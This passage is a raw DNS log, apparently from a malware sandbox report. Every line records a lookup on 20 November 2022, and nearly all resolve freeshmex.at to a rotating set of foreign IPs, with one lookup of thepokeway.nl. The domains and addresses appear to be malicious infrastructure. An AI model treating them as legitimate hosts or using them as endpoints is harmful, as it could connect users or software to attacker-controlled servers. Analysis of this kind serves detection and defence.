                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.619864941 CET8.8.8.8192.168.2.40x76a4No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.759512901 CET8.8.8.8192.168.2.40xf865No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.315705061 CET8.8.8.8192.168.2.40xc04aNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.788518906 CET8.8.8.8192.168.2.40xc176No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:21.983481884 CET8.8.8.8192.168.2.40xa74fNo error (0)thepokeway.nl5.135.247.111A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.232932091 CET8.8.8.8192.168.2.40xb74aNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.846496105 CET8.8.8.8192.168.2.40x9c9aNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.381015062 CET8.8.8.8192.168.2.40x1b54No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.503977060 CET8.8.8.8192.168.2.40x222bNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.088516951 CET8.8.8.8192.168.2.40xcfb4No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.600070000 CET8.8.8.8192.168.2.40x105No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.125757933 CET8.8.8.8192.168.2.40xb08No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.931942940 CET8.8.8.8192.168.2.40x50cdNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.061590910 CET8.8.8.8192.168.2.40x8d63No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.061590910 CET8.8.8.8192.168.2.40x8d63No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.061590910 CET8.8.8.8192.168.2.40x8d63No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.061590910 CET8.8.8.8192.168.2.40x8d63No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.061590910 CET8.8.8.8192.168.2.40x8d63No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.061590910 CET8.8.8.8192.168.2.40x8d63No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.061590910 CET8.8.8.8192.168.2.40x8d63No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.061590910 CET8.8.8.8192.168.2.40x8d63No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.061590910 CET8.8.8.8192.168.2.40x8d63No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.061590910 CET8.8.8.8192.168.2.40x8d63No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.328246117 CET8.8.8.8192.168.2.40x30aaNo error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.328246117 CET8.8.8.8192.168.2.40x30aaNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.328246117 CET8.8.8.8192.168.2.40x30aaNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.328246117 CET8.8.8.8192.168.2.40x30aaNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.328246117 CET8.8.8.8192.168.2.40x30aaNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.328246117 CET8.8.8.8192.168.2.40x30aaNo error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.328246117 CET8.8.8.8192.168.2.40x30aaNo error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.328246117 CET8.8.8.8192.168.2.40x30aaNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.328246117 CET8.8.8.8192.168.2.40x30aaNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.328246117 CET8.8.8.8192.168.2.40x30aaNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.875257015 CET8.8.8.8192.168.2.40xb35eNo error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.875257015 CET8.8.8.8192.168.2.40xb35eNo error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.875257015 CET8.8.8.8192.168.2.40xb35eNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.875257015 CET8.8.8.8192.168.2.40xb35eNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.875257015 CET8.8.8.8192.168.2.40xb35eNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.875257015 CET8.8.8.8192.168.2.40xb35eNo error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.875257015 CET8.8.8.8192.168.2.40xb35eNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.875257015 CET8.8.8.8192.168.2.40xb35eNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.875257015 CET8.8.8.8192.168.2.40xb35eNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.875257015 CET8.8.8.8192.168.2.40xb35eNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.278784037 CET8.8.8.8192.168.2.40xcac2No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.278784037 CET8.8.8.8192.168.2.40xcac2No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.278784037 CET8.8.8.8192.168.2.40xcac2No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.278784037 CET8.8.8.8192.168.2.40xcac2No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.278784037 CET8.8.8.8192.168.2.40xcac2No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.278784037 CET8.8.8.8192.168.2.40xcac2No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.278784037 CET8.8.8.8192.168.2.40xcac2No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.278784037 CET8.8.8.8192.168.2.40xcac2No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.278784037 CET8.8.8.8192.168.2.40xcac2No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.278784037 CET8.8.8.8192.168.2.40xcac2No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.767709970 CET8.8.8.8192.168.2.40x4809No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.767709970 CET8.8.8.8192.168.2.40x4809No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.767709970 CET8.8.8.8192.168.2.40x4809No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.767709970 CET8.8.8.8192.168.2.40x4809No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.767709970 CET8.8.8.8192.168.2.40x4809No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.767709970 CET8.8.8.8192.168.2.40x4809No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.767709970 CET8.8.8.8192.168.2.40x4809No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.767709970 CET8.8.8.8192.168.2.40x4809No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.767709970 CET8.8.8.8192.168.2.40x4809No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.767709970 CET8.8.8.8192.168.2.40x4809No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.758965015 CET8.8.8.8192.168.2.40x2527No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.758965015 CET8.8.8.8192.168.2.40x2527No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.758965015 CET8.8.8.8192.168.2.40x2527No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.758965015 CET8.8.8.8192.168.2.40x2527No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.758965015 CET8.8.8.8192.168.2.40x2527No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.758965015 CET8.8.8.8192.168.2.40x2527No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.758965015 CET8.8.8.8192.168.2.40x2527No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.758965015 CET8.8.8.8192.168.2.40x2527No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.758965015 CET8.8.8.8192.168.2.40x2527No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.758965015 CET8.8.8.8192.168.2.40x2527No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:41.305578947 CET8.8.8.8192.168.2.40x89f0No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:41.305578947 CET8.8.8.8192.168.2.40x89f0No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:41.305578947 CET8.8.8.8192.168.2.40x89f0No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:41.305578947 CET8.8.8.8192.168.2.40x89f0No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:41.305578947 CET8.8.8.8192.168.2.40x89f0No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
